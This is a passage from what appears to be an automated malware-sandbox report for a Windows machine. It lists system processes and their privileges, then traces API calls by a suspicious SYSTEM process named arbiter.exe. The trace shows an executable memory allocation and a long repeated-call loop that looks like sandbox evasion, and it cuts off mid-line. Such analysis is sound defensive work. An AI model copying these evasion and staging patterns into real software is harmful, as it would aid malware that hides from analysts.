"0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_daemon" parent_id = "2" os_parent_pid = "0xffffffffffffffff" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 43 os_tid = 0xb2c Thread: id = 44 os_tid = 0xaa0 Thread: id = 45 os_tid = 0x580 Thread: id = 46 os_tid = 0xb94 Thread: id = 47 os_tid = 0xb90 Thread: id = 48 os_tid = 0xb80 Thread: id = 49 os_tid = 0x124 Thread: id = 50 os_tid = 0xbc Thread: id = 51 os_tid = 0xd0 Thread: id = 52 os_tid = 0x5bc Thread: id = 53 os_tid = 0x18 Thread: id = 54 os_tid = 0x1c Thread: id = 55 os_tid = 0x5a8 Thread: id = 56 os_tid = 0x50 Thread: id = 57 os_tid = 0x7c Thread: id = 58 os_tid = 0x60 Thread: id = 59 os_tid = 0xd4 Thread: id = 60 os_tid = 0x328 Thread: id = 61 os_tid = 0x340 Thread: id = 62 os_tid = 0xa0 Thread: id = 63 os_tid = 0x650 Thread: id = 64 os_tid = 0x468 Thread: id = 65 os_tid = 0x584 Thread: id = 66 os_tid = 0x0 Thread: id = 67 os_tid = 0x648 Thread: id = 68 os_tid = 0x54c Thread: id = 69 os_tid = 0x570 Thread: id = 70 os_tid = 0x20 Thread: id = 71 os_tid = 0x474 Thread: id = 72 os_tid = 0x7f8 Thread: id = 73 os_tid = 0xf8 Thread: id = 74 os_tid = 0x24 Thread: id = 75 os_tid = 0x6f8 Thread: id = 76 os_tid = 0x6e4 Thread: id = 77 os_tid = 0x6d4 Thread: id = 78 os_tid = 0x6c4 Thread: id = 79 os_tid = 0x6b4 Thread: id = 80 os_tid = 0x6ac Thread: id = 81 os_tid = 0x84 Thread: id = 82 os_tid = 0x650 Thread: id = 83 os_tid = 0x590 Thread: id = 84 os_tid = 0x94 Thread: id = 85 os_tid = 0x488 Thread: id = 86 os_tid = 0x470 Thread: id = 87 os_tid = 0x68 Thread: id = 88 os_tid = 0x138 Thread: id = 89 os_tid = 0x3d8 Thread: id = 90 os_tid = 0x9c Thread: id = 91 os_tid = 0x88 Thread: id = 92 os_tid = 0x8c Thread: id = 93 os_tid = 0x5c Thread: id = 94 os_tid = 0x78 Thread: id = 95 os_tid = 0x308 Thread: id = 96 os_tid = 0x28c Thread: id = 97 os_tid = 0x74 Thread: id = 98 os_tid = 0x98 Thread: id = 99 os_tid = 0x34 Thread: id = 100 os_tid = 0x100 Thread: id = 101 os_tid = 0x198 Thread: id = 102 os_tid = 0x80 Thread: id = 103 os_tid = 0x158 Thread: id = 104 os_tid = 0x154 Thread: id = 105 os_tid = 0x150 Thread: id = 106 os_tid = 0x120 Thread: id = 107 os_tid = 0x90 Thread: id = 108 os_tid = 0x4c Thread: id = 109 os_tid = 0x130 Thread: id = 110 os_tid = 0x128 Thread: id = 111 os_tid = 0x124 Thread: id = 112 os_tid = 0x11c Thread: id = 113 os_tid = 0x118 Thread: id = 114 os_tid = 0xc4 Thread: id = 115 os_tid = 0x44 Thread: id = 116 os_tid = 0x28 Thread: id = 117 os_tid = 0x40 Thread: id = 118 os_tid = 0x2c Thread: id = 119 os_tid = 0x48 Thread: id = 120 os_tid = 0x38 Thread: id = 121 os_tid = 0xb8 Thread: id = 122 os_tid = 0x3c Thread: id = 123 os_tid = 0xc0 Thread: id = 124 os_tid = 0xb0 Thread: id = 125 os_tid = 0x30 Thread: id = 126 os_tid = 0x8 Thread: id = 330 os_tid = 0x478 Thread: id = 353 os_tid = 0x908 Thread: id = 370 os_tid = 0x9d4 Process: id = "10" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0x1bb25000" os_pid = "0x1d8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_daemon" parent_id = "2" os_parent_pid = "0x178" cmd_line = "C:\\Windows\\system32\\services.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 127 os_tid = 0xbc0 Thread: id = 128 os_tid = 0xbbc Thread: id = 129 os_tid = 0xbb0 Thread: id = 130 os_tid = 0xbac Thread: id = 131 os_tid = 0x4e8 Thread: id = 132 os_tid = 0x4dc Thread: id = 133 os_tid = 0x4d0 Thread: id = 134 os_tid = 0x378 Thread: id = 135 os_tid = 0x288 Thread: id = 136 os_tid = 0x24c Thread: id = 137 os_tid = 0x238 Thread: id = 138 os_tid = 0x234 Thread: id = 139 os_tid = 0x228 Thread: id = 140 os_tid = 0x224 Thread: id = 141 os_tid = 0x220 Thread: id = 142 os_tid = 0x21c Thread: id = 324 os_tid = 0x734 Thread: id = 343 os_tid = 0x5f4 Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xccc3000" os_pid = "0x250" os_integrity_level = "0x4000" os_privileges = "0x60b00080" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:00006e7a" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 143 os_tid = 0xb10 Thread: id = 144 os_tid = 0x708 Thread: id = 145 os_tid = 0x690 Thread: id = 146 os_tid = 0x2a0 Thread: id = 147 os_tid = 0x29c Thread: id = 148 os_tid = 0x284 Thread: id = 149 os_tid = 0x280 Thread: id = 150 os_tid = 0x27c Thread: id = 151 os_tid = 0x278 Thread: id = 152 os_tid = 0x274 Thread: id = 153 os_tid = 0x268 Thread: id = 154 os_tid = 0x260 Thread: id = 155 os_tid = 0x254 Thread: id = 376 os_tid = 0xec Process: id = "12" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1a2ff000" os_pid = "0x294" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b49c" [0xc000000f], "LOCAL" [0x7] Thread: id = 156 os_tid = 0x728 Thread: id = 157 os_tid = 0x3f8 Thread: id = 158 os_tid = 0x2c0 Thread: id = 159 os_tid = 0x2bc Thread: id = 160 os_tid = 0x2b8 Thread: id = 161 os_tid = 0x2b4 Thread: id = 162 os_tid = 0x2ac Thread: id = 163 os_tid = 0x298 Process: id = "13" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x24f0e000" os_pid = "0x2c8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b7a5" [0xc000000f], "LOCAL" [0x7] Thread: id = 164 os_tid = 0x8b8 Thread: id = 165 os_tid = 0xb98 Thread: id = 166 os_tid = 0x970 Thread: id = 167 os_tid = 0x138 Thread: id = 168 os_tid = 0x410 Thread: id = 169 os_tid = 0x5f8 Thread: id = 170 os_tid = 0x5f0 Thread: id = 171 os_tid = 0x5ec Thread: id = 172 os_tid = 0x5d0 Thread: id = 173 os_tid = 0x12c Thread: id = 174 os_tid = 0x170 Thread: id = 175 os_tid = 0x3c0 Thread: id = 176 os_tid = 0x3b8 Thread: id = 177 os_tid = 0x3a8 Thread: id = 178 os_tid = 0x2fc Thread: id = 179 os_tid = 0x2f8 Thread: id = 180 os_tid = 0x2e4 Thread: id = 181 os_tid = 0x2dc Thread: id = 182 os_tid = 0x2d4 Thread: id = 183 os_tid = 0x2cc Thread: id = 366 os_tid = 0x64 Process: id = "14" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xad16000" os_pid = "0x338" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bc99" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 184 os_tid = 0x950 Thread: id = 185 os_tid = 0x330 Thread: id = 186 os_tid = 0x638 Thread: id = 187 os_tid = 0x554 Thread: id = 188 os_tid = 0x748 Thread: id = 189 os_tid = 0x72c Thread: id = 190 os_tid = 0x720 Thread: id = 191 os_tid = 0x668 Thread: id = 192 os_tid = 0x65c Thread: id = 193 os_tid = 0x144 Thread: id = 194 os_tid = 0x110 Thread: id = 195 os_tid = 0x3f0 Thread: id = 196 os_tid = 0x3ec Thread: id = 197 os_tid = 0x3e4 Thread: id = 198 os_tid = 0x3e0 Thread: id = 199 os_tid = 0x3d0 Thread: id = 200 os_tid = 0x3cc Thread: id = 201 os_tid = 0x398 Thread: id = 202 os_tid = 0x394 Thread: id = 203 os_tid = 0x384 Thread: id = 204 os_tid = 0x380 Thread: id = 205 os_tid = 0x368 Thread: id = 206 os_tid = 0x350 Thread: id = 207 os_tid = 0x33c Process: id = "15" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 208 os_tid = 0xa5c Thread: id = 209 os_tid = 0xa4c Thread: id = 210 os_tid = 0xa14 Thread: id = 211 os_tid = 0xa04 Thread: id = 212 os_tid = 0x7e8 Thread: id = 213 os_tid = 0x320 Thread: id = 214 os_tid = 0x6cc Thread: id = 215 os_tid = 0x42c Thread: id = 216 os_tid = 0x1e4 Thread: id = 217 os_tid = 0x760 Thread: id = 218 os_tid = 0x75c Thread: id = 219 os_tid = 0x74c Thread: id = 220 os_tid = 0x710 Thread: id = 221 os_tid = 0x6d0 Thread: id = 222 os_tid = 0x6bc Thread: id = 223 os_tid = 0x6b8 Thread: id = 224 os_tid = 0x6b0 Thread: id = 225 os_tid = 0x6a8 Thread: id = 226 os_tid = 0x69c Thread: id = 227 os_tid = 0x698 Thread: id = 228 os_tid = 0x688 Thread: id = 229 os_tid = 0x684 Thread: id = 230 os_tid = 0x678 Thread: id = 231 os_tid = 0x4a8 Thread: id = 232 os_tid = 0x46c Thread: id = 233 os_tid = 0x44c Thread: id = 234 os_tid = 0x424 Thread: id = 235 os_tid = 0x420 Thread: id = 236 os_tid = 0x41c Thread: id = 237 os_tid = 0x404 Thread: id = 238 os_tid = 0x14c Thread: id = 239 os_tid = 0x158 Thread: id = 240 os_tid = 0x3fc Thread: id = 241 os_tid = 0x3f4 Thread: id = 242 os_tid = 0x3e8 Thread: id = 243 os_tid = 0x39c Thread: id = 244 os_tid = 0x390 Thread: id = 245 os_tid = 0x38c Thread: id = 246 os_tid = 0x388 Thread: id = 247 os_tid = 0x37c Thread: id = 248 os_tid = 0x374 Thread: id = 377 os_tid = 0x318 Thread: id = 382 os_tid = 0x35c Thread: id = 383 os_tid = 0x568 Process: id = "16" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9236000" os_pid = "0x11c" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e33a" [0xc000000f], "LOCAL" [0x7] Thread: id = 249 os_tid = 0x878 Thread: id = 250 os_tid = 0x984 Thread: id = 251 os_tid = 0x548 Thread: id = 252 os_tid = 0x608 Thread: id = 253 os_tid = 0x750 Thread: id = 254 os_tid = 0x6a0 Thread: id = 255 os_tid = 0x68c Thread: id = 256 os_tid = 0x680 Thread: id = 257 os_tid = 0x66c Thread: id = 258 os_tid = 0x614 Thread: id = 259 os_tid = 0x5fc Thread: id = 260 os_tid = 0x188 Thread: id = 261 os_tid = 0x140 Thread: id = 262 os_tid = 0x128 Thread: id = 263 os_tid = 0x2b0 Thread: id = 264 os_tid = 0x214 Thread: id = 265 os_tid = 0x130 Thread: id = 266 os_tid = 0x218 Thread: id = 267 os_tid = 0x1cc Thread: id = 339 os_tid = 0xb70 Process: id = "17" image_name = "spoolsv.exe" filename = "c:\\windows\\system32\\spoolsv.exe" page_root = "0x7c150000" os_pid = "0x47c" os_integrity_level = "0x4000" os_privileges = "0x20a00080" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\spoolsv.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Spooler" [0xe], "NT AUTHORITY\\Logon Session 00000000:00010a1b" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 268 os_tid = 0xabc Thread: id = 269 os_tid = 0x4b8 Thread: id = 270 os_tid = 0x4b4 Thread: id = 271 os_tid = 0x498 Thread: id = 272 os_tid = 0x494 Thread: id = 273 os_tid = 0x480 Thread: id = 352 os_tid = 0x5a8 Thread: id = 363 os_tid = 0xaac Thread: id = 364 os_tid = 0xb1c Thread: id = 367 os_tid = 0x9b4 Thread: id = 368 os_tid = 0x980 Thread: id = 369 os_tid = 0x9a4 Thread: id = 371 os_tid = 0xb2c Thread: id = 372 os_tid = 0xcc Thread: id = 373 os_tid = 0xd0 Thread: id = 375 os_tid = 0xe8 Thread: id = 378 os_tid = 0xb48 Thread: id = 379 os_tid = 0x51c Thread: id = 380 os_tid = 0x518 Thread: id = 381 os_tid = 0x55c Process: id = "18" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x35aa000" os_pid = "0x4bc" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BFE" [0xe], "NT SERVICE\\DPS" [0xa], "NT SERVICE\\MpsSvc" [0xa], "NT SERVICE\\pla" [0xa], "NT SERVICE\\WwanSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0001106d" [0xc000000f], "LOCAL" [0x7], "NT AUTHORITY\\WRITE RESTRICTED" [0x7] Thread: id = 274 os_tid = 0x8c8 Thread: id = 275 os_tid = 0x7d8 Thread: id = 276 os_tid = 0x744 Thread: id = 277 os_tid = 0x740 Thread: id = 278 os_tid = 0x73c Thread: id = 279 os_tid = 0x6d8 Thread: id = 280 os_tid = 0x63c Thread: id = 281 os_tid = 0x62c Thread: id = 282 os_tid = 0x628 Thread: id = 283 os_tid = 0x624 Thread: id = 284 os_tid = 0x61c Thread: id = 285 os_tid = 0x610 Thread: id = 286 os_tid = 0x5e8 Thread: id = 287 os_tid = 0x5c8 Thread: id = 288 os_tid = 0x5c0 Thread: id = 289 os_tid = 0x5a0 Thread: id = 290 os_tid = 0x4f8 Thread: id = 291 os_tid = 0x4ec Thread: id = 292 os_tid = 0x4e0 Thread: id = 293 os_tid = 0x4d4 Thread: id = 294 os_tid = 0x4c4 Thread: id = 295 os_tid = 0x4c0 Process: id = "19" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0xded000" os_pid = "0x4c8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "\"taskhost.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 296 os_tid = 0x888 Thread: id = 297 os_tid = 0x7f0 Thread: id = 298 os_tid = 0x794 Thread: id = 299 os_tid = 0x784 Thread: id = 300 os_tid = 0x77c Thread: id = 301 os_tid = 0x778 Thread: id = 302 os_tid = 0x770 Thread: id = 303 os_tid = 0x500 Thread: id = 304 os_tid = 0x4f4 Thread: id = 305 os_tid = 0x4d8 Thread: id = 306 os_tid = 0x4cc Thread: id = 342 os_tid = 0xab4 Thread: id = 374 os_tid = 0xd8 Process: id = "20" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0x71718000" os_pid = "0x82c" os_integrity_level = "0x4000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "taskhost.exe $(Arg0)" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT TASK\\Microsoft-Windows-SideShow-AutoWake" [0xe], "NT TASK\\Microsoft-Windows-SideShow-SystemDataProviders" [0xe], "NT TASK\\Microsoft-Windows-Customer Experience Improvement Program-UsbCeip" [0xe], "NT TASK\\Microsoft-Windows-Ras-MobilityManager" [0xe], "NT TASK\\Microsoft-Windows-PerfTrack-BackgroundConfigSurveyor" [0xe], "NT TASK\\Microsoft-Windows-RAC-RacTask" [0xe], "NT TASK\\Microsoft-Windows-Customer Experience Improvement Program-KernelCeipTask" [0xe], "NT AUTHORITY\\Logon Session 00000000:000563e2" [0xc0000007], "LOCAL" [0x7] Thread: id = 307 os_tid = 0xbf0 Thread: id = 308 os_tid = 0x8fc Thread: id = 309 os_tid = 0x8ec Thread: id = 310 os_tid = 0x8dc Thread: id = 311 os_tid = 0x8cc Thread: id = 312 os_tid = 0x8bc Thread: id = 313 os_tid = 0x8ac Thread: id = 314 os_tid = 0x88c Thread: id = 315 os_tid = 0x86c Thread: id = 316 os_tid = 0x85c Thread: id = 317 os_tid = 0x84c Thread: id = 318 os_tid = 0x83c Process: id = "21" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x45533000" os_pid = "0x9f8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceAndNoImpersonation" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\FDResPub" [0xa], "NT SERVICE\\FontCache" [0xe], "NT SERVICE\\Mcx2Svc" [0xa], "NT SERVICE\\QWAVE" [0xa], "NT SERVICE\\SCardSvr" [0xa], "NT SERVICE\\SensrSvc" [0xa], "NT SERVICE\\SSDPSRV" [0xa], "NT SERVICE\\TBS" [0xa], "NT SERVICE\\upnphost" [0xa], "NT SERVICE\\wcncsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0005ec83" [0xc000000f], "LOCAL" [0x7] Thread: id = 319 os_tid = 0x664 Thread: id = 320 os_tid = 0xa50 Thread: id = 321 os_tid = 0x738 Thread: id = 322 os_tid = 0x694 Thread: id = 333 os_tid = 0x960 Thread: id = 340 os_tid = 0xb50 Process: id = "22" image_name = "arbiter.exe" filename = "c:\\windows\\syswow64\\arbiter.exe" page_root = "0x45939000" os_pid = "0xa60" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\SysWOW64\\Arbiter.exe -s" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 323 os_tid = 0x974 [0068.969] LoadCursorW (hInstance=0x0, lpCursorName=0x257f) returned 0x0 [0068.970] GetUserNameA (in: lpBuffer=0x18ff18, pcbBuffer=0x18ff84 | out: lpBuffer="SYSTEM", pcbBuffer=0x18ff84) returned 1 [0069.408] GetEnhMetaFileA (lpName="u7968o987uyte444") returned 0x0 [0069.408] GetLastError () returned 0x2 [0069.408] LoadIconA (hInstance=0x0, lpIconName=0x7f04) returned 0x1002f [0069.408] DeleteMetaFile (hmf=0x1) returned 0 [0069.408] LoadLibraryA (lpLibFileName="advapi32") returned 0x77710000 [0069.408] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExA") returned 0x777248ef [0069.409] RegOpenKeyA (in: hKey=0x80000000, lpSubKey="InterfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}", phkResult=0x50b818 | out: phkResult=0x50b818*=0x98) returned 0x0 [0069.410] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0069.410] RegQueryValueExA (in: hKey=0x98, lpValueName="", lpReserved=0x0, lpType=0x18febc, lpData=0x18fdf0, lpcbData=0x50b3e8*=0xc8 | out: lpType=0x18febc*=0x1, lpData="IEnumConnections", lpcbData=0x50b3e8*=0x11) returned 0x0 [0069.410] LoadLibraryA (lpLibFileName="kernel32") returned 0x76d30000 [0069.410] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0069.410] VirtualAlloc (lpAddress=0x0, dwSize=0xf000, flAllocationType=0x3000, flProtect=0x40) returned 0x2d0000 [0069.410] LoadIconA (hInstance=0x0, lpIconName=0x24a7) returned 0x0 [0069.411] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.411] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.411] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.411] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.411] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.411] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.411] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.411] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.411] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.411] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.411] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.411] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.411] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.411] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.411] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.411] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.411] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.411] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.412] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.412] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.412] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.412] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.412] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.412] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.412] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.412] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.412] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.412] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 